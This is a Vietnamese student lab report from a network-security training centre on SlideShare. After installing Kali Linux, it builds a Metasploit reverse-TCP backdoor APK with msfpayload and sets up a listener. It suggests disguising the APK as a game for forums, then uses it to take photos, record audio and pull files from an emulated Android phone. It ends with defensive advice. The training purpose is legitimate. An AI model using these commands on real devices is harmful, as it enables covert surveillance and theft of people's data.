SlideShare a Scribd company logo

Bao cao athena 2

Download as DOCX, PDF
N
NhoxPO

Báo Cáo Athena

Education
1 of 26
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO TUẦN ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI CBHD: Võ Đỗ Thắng SVTH: Nguyễn Đức Thái Tp. HCM Ngày 29 Tháng 06 Năm 2014
Mục Lục Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công vào Android......................... 1 1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux để xâm nhập vào máy Android .................................................................................................................................................. 1 1.1. Tổng quan .............................................................................................................................. 1 1.2. Cải tiến của Kali Linux so với Backtrack. .......................................................................... 1 1.3. Cài đặt Kali Linux................................................................................................................. 2 1.3.1. Chuẩn bị......................................................................................................................... 2 1.3.2. Cài đặt. ........................................................................................................................... 2 1.4. Tạo mã độc trên Kali Linux để xâm nhập Android......................................................... 15
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 1 Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công vào Android. 1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux để xâm nhập vào máy Android 1.1. Tổng quan Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. 1.2. Cải tiến của Kali Linux so với Backtrack.  Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ.  Tính tương thích kiến trúc Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.  Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.  Khả năng tùy biến cao
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 2 Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.  Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3). Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa 1.3. Cài đặt Kali Linux 1.3.1. Chuẩn bị.  File iso Kali Linux: http://www.kali.org/downloads/  Máy có cài sẵn Vmware. 1.3.2. Cài đặt. Đầu tiên ta cần download Kali Linux tại link sau http://www.kali.org/downloads/. Chọn phiên bản phù hợp tiến hành download. Ở đây chọn phiên bản dành cho windowns 32 bit download bằng link trực tiếp. Sau khi có file iso ta tiến hành cài đặt Kali Linux trên máy ảo. Khởi động VMwarre, ở góc phải trên màn hình chọn File -> New Virtual Machine....
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 3 Hình 12. Chon phương thức cái đặt. Chọn Typical, nhấn Next để tiếp tục. Hình 33. Tìm đường dẫn đến file iso Kali Linux. Chọn Installer disc image file, nhấn Browse… tìm đường dẫn đến file iso của Kali Linux sau đó nhấn Next để tiếp tục.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 4 Hình 34. Chọn dung lượng đĩa. Thiết đặt dung lượng tối đa dùng để cài đặt Kali Linux sau đó chọn Next. Hình 35. Xác nhận cài Đặt. Chọn Finish để xác nhận tiến hành cài đặt.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 5 Hình 36. Cài đặt Kali Linux. Tại đây ta chọn Graphical install => Enter để tiến hành cài đặt trực quan bằng giao diện. Hình 37. Chọn Ngôn Ngữ. Tiến hành chọn lựa ngôn ngữ (ở đây chọn English), nhấn continue.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 6 Hình 38. Chọn khu vực. Lựa chọn khu vực ta chọn other => Continue. Hình 39. Khu vực Asia. Tiếp tục chọn khu vực là Asia => Continue.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 7 Hình 20. Chọn quốc gia Viet Nam. Chọn quốc gia là Viet Nam => Continue. Hình 41. Chọn bảng mã. Chọn bảng mã là United States – en_US.UTF. Bảng mã này gồm đầy đủ các ký tự Latinh đồng thời hỗ trợ Tiếng Việt. Nhấn Continue để tiếp tục.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 8 Hình 42. Chọn kiểu bàn phím. Chọn kiểu bàn phím Ameican English => Continue. Hình 43. Đặt Hostname. Tiếp theo là thiết đặt mạng. Đặt tên Hostname là bắt buộc. Ta có thể đặt tên bất kỳ nhưng không thể có khoảng trắng. Nhấn Continue để tiếp tục.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 9 Hình 44. Đặt Domain name. Có thể bỏ trống Domain name => Continue. Hình 43. Đặt root password. Điền hai lần Root password giống nhau (nhớ password đã đặt để sau này đăng nhập) => Continue.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 10 Hình 44. Tùy chọn ổ đĩa. Tùy chọn ổ đĩa cài đặt. Ở đây ta chọn use entire disk -> continue. Hình 45. Chọn ổ đĩa cài đặt. Tiếp tục nhấn Continue.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 11 Hình 46. Phương thức cài đặt ổ đĩa. Chọn All file in one partion => Continue. Hình 47. Xác nhận thông số cài đặt. Kiểm tra thiết đặt thông tin ổ đĩa. Nếu có sai sót chọn Go Back để sửa đổi. Chọn Continue tiếp tục.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 12 Hình 50. Xác nhận định dạng ổ đĩa. Chọn Yes để xác nhận thay đổi ổ đĩa => Continue để tiến trình bắt đầu copy file và cài đặt Kali Linux. Hình 51. Cài đặt bắt đầu.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 13 Hình 52. Tìm kiếm cập nhật qua internet. Ở đây nếu chọn Yes tiến trình sẽ kiểm tra có hay không bản cập nhật qua mạng. Ta chọn No để nhanh chóng cài đặt (có thể cập nhật sau khi cài đặt xong). Hình 53. Xác nhận cài đặt GRUD.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 14 Tiếp theo tiến trình sẽ hỏi có cài đặt và sử dụng GRUB để khởi động không. Ta chọn Yes => Continue. Hình 54. Xác nhận cài đặt thành công. Thông báo xác nhận Kali Linux Đã cài đặt xong. Ta chọn Continue tiến trình sẽ thực hiện xoa một số file dư thừa sau khi cài đặt rồi khởi động lại.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 15 Hình 55. Đăng nhập Kali Linux. Sau khi khởi động xong ta nhập User là root va password được đặt ở trên để đăng nhập. Như vậy là ta đã hoàn thành cài đặt xong Kali Linux. 1.4. Tạo mã độc trên Kali Linux để xâm nhập Android. Trước khi tiến hành ta nên thiết lập phần Network như sau: Vào VM => Settings... ở thanh lựa chọn của Vmware
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 16 Vào Network Adapter và chọn Bridged: connection directly to the physical network Vào Edit => Virtual Network Editor... Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 17 Tiếp theo ta sẽ tiến hành xâm nhập và điều khiển Android bằng Kali Linux. Đầu tiên ta cần tạo 1 file apk có chứa backdoor bằng cách: Đầu tiên mở terminal và gõ dòng lệnh ifconfig để biêt thông tin ip của máy.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 18 Sử dụng lệnh msfpayload android/meterpreter/reverse_tcp lhost=192.168.240.132 lport=4444 R > /root/Desktop/App.apk để tạo backdoor. Với 192.168.240.132 là ip đã tìm được ở trên. Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 19 Tiếp theo, gõ lệnh msfconsole Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler set payload /meterpreter/reverse_tcp set lhost 192.168.240.132 – nhập địa chỉ IP giống với khi tạo payload ở trên. set port 4444 – nhập port giống với port khi tạo payload ở trên. exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. Đến đây, vấn đề của chúng ta là làm sao để phân tán file chứa backdoor App.apk đến các máy Android. Ta có thể ngụy trang file App.apk thành một ứng dụng, game va tiến hành chia sẻ trên forum. Ở đây thử với một máy Galaxy Nexus One giả lập, tải về App.apk, cài đặt:
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 20 Khởi động ứng dụng vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau: Để xem tất cả các lệnh hỗ trợ nhập help
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 21 Để xem thông tin về máy, nhập lệnh SysInfo Xem thông tin card mạng nhập lệnh ipconfig: Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 22 File hình đã chụp từ camera của máy android là RbWBRryj.jpeg được lưu ở /root của máy Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy Ta được file ghi âm Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 23 Ví dụ ở đây, ta tải file App.apk trong thư mục sdcard.dùng lệnh download App.apk Và file này sẽ được tải về thư mục root của máy Kali Nhập lệnh shell để điều khiển máy trong chế độ shell. Tai đây ta nhập lệnh ls –l để xem các file và quyền hạn cần để sử dụng.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 24 Như các bạn cũng thấy thư muc data cần quyền hạn cao nhất để tiến hành sử dụng. Mà các dữ liệu quan trọng như Contacts, SMS, tài khoản đồng bộ Google… đều được lưu tại đây. Vi thế ta chỉ có thể lấy cắp các thông tin này nếu như máy Android bị xâm nhập đã được root (hack chiếm quyền điều khiển cao nhất). Kết luận Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy Android về máy. Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, không tiến hành root may nếu không thực sự cần thiết vì chỉ cần máy bị nhiễm backdoor là ta đã có thể xem như có toàn quyền kiểm soát máy Android đó.

Recommended

Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5Nguyen Anh
 
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
Xuân Ngọc Nguyễn
 
Hướng dẫn cài đặt android trên máy tính
Hướng dẫn cài đặt android trên máy tínhHướng dẫn cài đặt android trên máy tính
Hướng dẫn cài đặt android trên máy tính
Môi Trường Việt
 
Hướng dẫn cài Windows 7 từ ổ cứng
Hướng dẫn cài Windows 7 từ ổ cứngHướng dẫn cài Windows 7 từ ổ cứng
Hướng dẫn cài Windows 7 từ ổ cứng
Thích Hô Hấp
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
Xuân Ngọc Nguyễn
 
Cài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaCài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaHoàng Phúc Phạm
 

Recommended

Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5Nguyen Anh
 
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
Xuân Ngọc Nguyễn
 
Hướng dẫn cài đặt android trên máy tính
Hướng dẫn cài đặt android trên máy tínhHướng dẫn cài đặt android trên máy tính
Hướng dẫn cài đặt android trên máy tính
Môi Trường Việt
 
Hướng dẫn cài Windows 7 từ ổ cứng
Hướng dẫn cài Windows 7 từ ổ cứngHướng dẫn cài Windows 7 từ ổ cứng
Hướng dẫn cài Windows 7 từ ổ cứng
Thích Hô Hấp
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
Xuân Ngọc Nguyễn
 
Cài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaCài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaHoàng Phúc Phạm
 
It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thang
laonap166
 
Tuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxTuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxHường Tô
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
Vương Nguyễn
 
bao cao tuan 1
bao cao tuan 1bao cao tuan 1
bao cao tuan 1Thiên Nguyễn
 
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬPHƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
dvms
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
Xuân Ngọc Nguyễn
 
Hướng dẫn cài đặt centOS 6.5-Thực Tập Athena
Hướng dẫn cài đặt centOS 6.5-Thực Tập AthenaHướng dẫn cài đặt centOS 6.5-Thực Tập Athena
Hướng dẫn cài đặt centOS 6.5-Thực Tập Athenaquocluong
 
Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)
Văn Nguyễn Trung
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Lê Lãnh
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
Hữu Mỹ Lê Phan
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
Chuc Thanh
 
Xoa mu linux
Xoa mu linuxXoa mu linux
Xoa mu linuxIntegrated Circuit Design Research & Education Center (ICDREC)
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
Loc Loc
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
kakawpah0911
 
Baocaotuan1
Baocaotuan1Baocaotuan1
Baocaotuan1
killertanya
 
Kali
KaliKali
Kali
Vương Nguyễn
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huyBao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
hoaihuysc
 
Athena tuần 1
Athena tuần 1Athena tuần 1
Athena tuần 1thanhthong1210
 
Kali linux
Kali linuxKali linux
Kali linux
Tân Trần
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidVũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Anh Hiếu
 
1
11
1
Chuc Thanh
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 

More Related Content

What's hot

It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thang
laonap166
 
Tuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxTuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxHường Tô
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
Vương Nguyễn
 
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬPHƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
dvms
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
Xuân Ngọc Nguyễn
 
Hướng dẫn cài đặt centOS 6.5-Thực Tập Athena
Hướng dẫn cài đặt centOS 6.5-Thực Tập AthenaHướng dẫn cài đặt centOS 6.5-Thực Tập Athena
Hướng dẫn cài đặt centOS 6.5-Thực Tập Athenaquocluong
 
Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)
Văn Nguyễn Trung
 

What's hot (8)

It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thang
 
Tuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxTuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linux
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
 
bao cao tuan 1
bao cao tuan 1bao cao tuan 1
bao cao tuan 1
 
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬPHƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
 
Hướng dẫn cài đặt centOS 6.5-Thực Tập Athena
Hướng dẫn cài đặt centOS 6.5-Thực Tập AthenaHướng dẫn cài đặt centOS 6.5-Thực Tập Athena
Hướng dẫn cài đặt centOS 6.5-Thực Tập Athena
 
Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)
 

Similar to Bao cao athena 2

Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Lê Lãnh
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
Hữu Mỹ Lê Phan
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
Chuc Thanh
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
Loc Loc
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
kakawpah0911
 
Baocaotuan1
Baocaotuan1Baocaotuan1
Baocaotuan1
killertanya
 
Kali
KaliKali
Kali
Vương Nguyễn
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huyBao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
hoaihuysc
 
Kali linux
Kali linuxKali linux
Kali linux
Tân Trần
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidVũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Anh Hiếu
 
1
11
1
Chuc Thanh
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
Thái Tuấn Lưu
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
Chuc Thanh
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
kakawpah0911
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Xuân Ngọc Nguyễn
 
2. Getting Comfortable with Kali Linux.pdf
2. Getting Comfortable with Kali Linux.pdf2. Getting Comfortable with Kali Linux.pdf
2. Getting Comfortable with Kali Linux.pdf
MinhNguyenthi11
 

Similar to Bao cao athena 2 (20)

Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 
Xoa mu linux
Xoa mu linuxXoa mu linux
Xoa mu linux
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
Baocaotuan1
Baocaotuan1Baocaotuan1
Baocaotuan1
 
Kali
KaliKali
Kali
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huyBao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
Athena tuần 1
Athena tuần 1Athena tuần 1
Athena tuần 1
 
Kali linux
Kali linuxKali linux
Kali linux
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidVũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
1
11
1
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
2. Getting Comfortable with Kali Linux.pdf
2. Getting Comfortable with Kali Linux.pdf2. Getting Comfortable with Kali Linux.pdf
2. Getting Comfortable with Kali Linux.pdf
 

Recently uploaded

Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nayẢnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
chinhkt50
 
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptxDẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
nvlinhchi1612
 
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
